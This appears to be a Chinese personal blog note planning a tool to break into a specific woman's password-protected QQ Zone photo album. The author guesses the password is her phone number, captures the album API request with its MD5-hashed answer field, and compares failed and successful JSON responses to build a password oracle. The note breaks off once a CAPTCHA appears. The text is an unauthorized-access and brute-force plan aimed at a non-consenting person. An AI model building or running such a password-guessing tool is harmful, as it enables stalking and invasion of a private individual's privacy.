计划写一个获取qq空间加密相册的工具。
分析:
她的相册密码是手机号,先写一个生成手机号的脚本
空间有她之前的手机号,那么她现在的手机号也极有可能是一样的运营商,比如移动(缩小密码范围)
自己新建一个加密相册,通过工具测试,看看成功或失败的response内容的差别。
扩展工具,可以进行多种密码类型的组合
记录:
https://h5.qzone.qq.com/proxy/domain/photo.qzone.qq.com/fcgi-bin/cgi_list_photo ?g_tk=238297171 &callback=shine3_Callback &t=247612204 &mode=0 &idcNum=4 &hostUin=xxx9883609 &topicId=V12sTtCU1D7iEU &noTopic=0 &uin=xxx3633125 &pageStart=0 &pageNum=1 &skipCmtCount=0 &singleurl=1 &batchId= ¬ice=0 &appid=4 &inCharset=utf-8 &outCharset=utf-8 &source=qzone &plat=qzone &outstyle=json &format=jsonp &json_esc=1 &question=%E6%89%8B%E6%9C%BA &answer=E10ADC3949BA59ABBE56E057F20F883E &callbackFun=shine3 &_=1510406853362
结果:
shine3_Callback({ "code":-10805, "subcode":-10805, "message":"对不起,回答错误", "notice":0, "time":1510406993, "tips":"2A93-540", "data":{ "priv" : 5, "question" : "手机", "t" : "247612204" } } );
&question=%E6%89%8B%E6%9C%BA (手机)
&answer=E10ADC3949BA59ABBE56E057F20F883E(123456)
answer是md5加密
工具:http://www.cmd5.com/
输入正确的密码,得到:adadacb7c2658e921758d3c4bf90765d
转大写:https://bigtosmall.51240.com/
ADADACB7C2658E921758D3C4BF90765D
替换之前错误的,返回结果:
shine3_Callback({ "code":0, "subcode":0, "message":"", "default":0, "data": { "limit" : 0, "photoList" : [ { "batchId" : "1510404687051", "browser" : 0, "cameratype" : " ", "cp_flag" : false, "cp_x" : 540, "cp_y" : 822, "desc" : "", "exif" : { "exposureCompensation" : "", "exposureMode" : "", "exposureProgram" : "", "exposureTime" : "", "flash" : "", "fnumber" : "", "focalLength" : "", "iso" : "", "lensModel" : "", "make" : "", "meteringMode" : "", "model" : "", "originalTime" : "" }, "forum" : 0, "frameno" : 0, "height" : 1920, "id" : 0, "is_video" : false, "is_weixin_mode" : 0, "ismultiup" : 0, "lloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!", "modifytime" : 1510404664, "name" : "2017-11-11", "origin" : 0, "origin_upload" : 0, "origin_url" : "", "owner" : "xxx9883609", "ownername" : "xxx9883609", "photocubage" : 16930, "phototype" : 17, "picmark_flag" : 0, "picrefer" : 66, "platformId" : 52, "platformSubId" : 2, "poiName" : "", "pre" : "http://b242.photo.store.qq.com/psbe?/V12sTtCU1D7iEU/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i/a/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!", "raw" : "", "raw_upload" : 0, "rawshoottime" : "2017-11-08 14:24:07", "shoottime" : "2017-11-08 ", "shorturl" : "", "sloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!", "tag" : "", "uploadtime" : "2017-11-11 20:51:04", "url" : "http://b242.photo.store.qq.com/psbe?/V12sTtCU1D7iEU/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i/b/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!", "width" : 1080, "yurl" : 0 } ], "t" : "247612204", "topic" : { "bitmap" : "10000010", "browser" : 0, "classid" : 106, "comment" : 1, "cover_id" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!", "createtime" : 1510404663, "desc" : "", "handset" : 0, "id" : "V12sTtCU1D7iEU", "is_share_album" : 0, "lastuploadtime" : 1510404703, "modifytime" : 1510406803, "name" : "2017.11.11", "ownerName" : "xxx9883609", "ownerUin" : "xxx9883609", "pre" : "http://b242.photo.store.qq.com/psbe?/V12sTtCU1D7iEU/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt/a/dPIAAAAAAAAA", "priv" : 5, "pypriv" : 3, "share_album_owner" : 0, "total" : 10, "url" : "http://b242.photo.store.qq.com/psbe?/V12sTtCU1D7iEU/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt/b/dPIAAAAAAAAA", "viewtype" : 2
返回正确的结果了。
我们可以通过shine3_Callback的code 的值判断密码的正误。
当然,现实怎么会如此美好,当我尝试多次后发现有验证码,腾讯考虑的真TMD周到!
关于怎么获取验证码还需要研究下。待续。。。